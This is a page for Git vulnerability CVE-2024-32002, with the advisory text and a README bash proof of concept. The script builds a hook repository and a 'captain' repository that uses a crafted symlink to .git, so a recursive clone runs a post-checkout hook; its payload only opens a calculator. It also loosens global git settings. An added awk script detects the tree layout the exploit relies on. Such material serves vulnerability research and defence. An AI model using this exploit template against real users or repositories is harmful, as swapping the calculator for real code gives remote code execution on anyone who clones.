CVE-2024-32002 PoC — Git's recursive clones on case-insensitive filesystems that support symlinks are susceptible to Remote Code Execution

Associated Vulnerability
Title: Git's recursive clones on case-insensitive filesystems that support symlinks are susceptible to Remote Code Execution (CVE-2024-32002)
Description: Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, repositories with submodules can be crafted in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a `.git/` directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. If symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. As always, it is best to avoid cloning repositories from untrusted sources.
Description
CVE-2024-32002 is a severe vulnerability in Git that allows an attacker to execute arbitrary code remotely (RCE) when a user runs a git clone operation.
Readme
# CVE-2024-32002-EXP

```
#!/bin/bash

# Set Git configuration options
git config --global protocol.file.allow always
git config --global core.symlinks true
# Avoid the warning message (set the default branch to main)
git config --global init.defaultBranch main

# Define the tell-tale path
tell_tale_path="$PWD/tell.tale"

# Initialize the hook repository
git init hook
cd hook
mkdir -p y/hooks

# Write the malicious code into the hook; covers both Windows and macOS environments
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
calc.exe
open -a Calculator.app
EOF

# Make the hook executable: important
chmod +x y/hooks/post-checkout

git add y/hooks/post-checkout
git commit -m "post-checkout"

cd ..

# Define the hook repository path
hook_repo_path="$(pwd)/hook"

# Initialize the captain repository
git init captain
cd captain
git submodule add --name x/y "$hook_repo_path" A/modules/x
git commit -m "add-submodule"

# Create the symbolic link
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
cd ..

# Local test; not needed when the repositories are pushed to GitHub
git clone --recursive captain hooked
```

https://github.com/10cks/captain

https://github.com/10cks/hook
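
A defender-side check for the tree layout this PoC builds, as an added example that is not part of the original README or the PoC author's code: it reads `git ls-tree -r` output and reports any symlink whose path matches, ignoring case, a leading directory of a submodule path. The function names are hypothetical, and the sample trees and placeholder object IDs are constructed.

```bash
#!/bin/bash
# Added example (not from the PoC): flag symlinks that, ignoring case,
# shadow a leading directory of a submodule path.
# Input on stdin: `git ls-tree -r <commit>` lines: "<mode> <type> <oid>\t<path>".
find_symlink_submodule_collisions() {
  awk -F'\t' '
    {
      split($1, meta, " ")                 # meta[1] is the file mode
      if (meta[1] == "120000")      links[tolower($2)] = $2   # symlink
      else if (meta[1] == "160000") subs[$2] = 1              # gitlink (submodule)
    }
    END {
      for (s in subs) {
        n = split(tolower(s), parts, "/")
        prefix = ""
        for (i = 1; i < n; i++) {          # every leading directory of the path
          prefix = (i == 1) ? parts[i] : prefix "/" parts[i]
          if (prefix in links)
            printf "COLLISION symlink=%s submodule=%s\n", links[prefix], s
        }
      }
    }'
}

# Constructed sample: the tree shape the PoC "captain" repository ends up with.
sample_poc_tree() {
  oid=0000000000000000000000000000000000000000   # placeholder object id
  printf '100644 blob %s\t.gitmodules\n' "$oid"
  printf '160000 commit %s\tA/modules/x\n' "$oid"
  printf '120000 blob %s\ta\n' "$oid"
}

# Constructed sample: a symlink and a submodule that do not collide.
sample_benign_tree() {
  oid=0000000000000000000000000000000000000000   # placeholder object id
  printf '160000 commit %s\tvendor/lib\n' "$oid"
  printf '120000 blob %s\tdocs/latest\n' "$oid"
}

sample_poc_tree | find_symlink_submodule_collisions
sample_benign_tree | find_symlink_submodule_collisions
```

On a real repository, feed it `git ls-tree -r HEAD` from a clone made with `--no-checkout` and without `--recursive`. Paths that `git ls-tree` prints in quoted form (unusual characters) are assumed not to occur in the input.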